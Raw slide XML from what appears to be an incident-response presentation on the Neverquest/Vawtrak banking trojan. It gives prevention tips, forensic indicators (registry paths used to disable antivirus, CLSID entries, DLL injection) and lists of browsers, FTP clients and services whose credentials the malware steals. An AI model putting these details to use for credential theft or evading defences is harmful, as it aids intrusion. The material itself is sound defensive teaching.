              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Install a good antivirus product. One with email scanning is better.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Don’t open attachments or click on links from unknown sources.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Does your browser block suspicious sites?</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914428"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>For the Incident Responder</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="340665" y="1520950"/>
            <a:ext cx="8478213" cy="3669099"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Memory analysis </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Suspicious CLSID values within the browser process</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DLL injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Was </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AntiVirus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> configured properly?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HKLM\SOFTWARE\Policies\Microsoft\Windows\Safer\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CodeIdentifiers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\0\Paths\[hash value]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Its all in the Registry:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>UsrClass.dat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\CLSID\{generated string}</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1043400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Neverquest</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="340665" y="1880776"/>
            <a:ext cx="8478213" cy="2941537"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Aka. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Vawtrak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Snifula</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>First observed around mid 2013.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Continuously evolving.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Neverquest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> campaigns have targeted victims in over 25 countries and hundreds of banking, financial and retail institutions.</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804668"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>References</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="340665" y="1567991"/>
            <a:ext cx="8478213" cy="3810217"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Alvarez, R. (2015). Nesting doll: Unwrapping </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Vawtrak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. Virus Bulletin.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Golovanov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, S. (2013). Online Banking Faces a New Threat. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Securelist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Kroustek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, J.(2015). Analysis of Banking Trojan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Vawtrak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. AVG Technologies, Virus Lab.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Malenkovich</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, S. (2013). </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Neverquest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Trojan: Built to Steal from Hundreds of Banks. Kaspersky. Retrieved from URL.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Prince, B. (2014). ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Vawtrak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>’ Banking Trojan Continues to Evolve. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Securityweek.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. Retrieved from URL.</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1"/>
            <a:ext cx="8478213" cy="741949"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>References</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="340666" y="1834551"/>
            <a:ext cx="8478213" cy="3285682"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Proofpoint</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (2015). </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>AbaddonPOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-A-New-Point-Of-Sale-Threat-Linked-To-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Vawtrak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. Retrieved from URL.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Symantec. (2013). Dangerous New Banking Trojan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Neverquest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is an Evolution of an Older Threat. Symantec Security Response. Retrieved from URL.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Wyke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, J. (2014). </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Vawtrak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – International </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Crimeware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-as-a-Service. Sophos.</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804668"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Thank You</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="340665" y="2493106"/>
            <a:ext cx="8478213" cy="2329208"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Tim </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Slaybaugh</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>solidstateforensics@gmail.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>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6" y="1014202"/>
            <a:ext cx="8478213" cy="584140"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1" smtClean="0"/>
              <a:t>Neverquest</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="340666" y="2178204"/>
            <a:ext cx="2357929" cy="2780371"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Facebook</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Doubleclick</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Office</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Google</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Amazon</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Farmville</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Gmail</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Yahoo</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Twitter</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="340666" y="1598341"/>
            <a:ext cx="8162693" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
              <a:t>It’s not just banking data:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2064083" y="2178204"/>
            <a:ext cx="2357929" cy="2780371"/>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dirty="0" err="1" smtClean="0"/>
              <a:t>CuteFTP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>FileZilla</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>WinSCP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>MyFTP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Yandex</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>SecureFX</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>NetDrive</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>WebDrive</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Steampowered</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4208835" y="2178203"/>
            <a:ext cx="2357929" cy="27803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1700" dirty="0" smtClean="0"/>
              <a:t>Opera</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>Firefox</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>Chrome</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1" smtClean="0"/>
              <a:t>PuTTy</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1" smtClean="0"/>
              <a:t>Incredimail</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
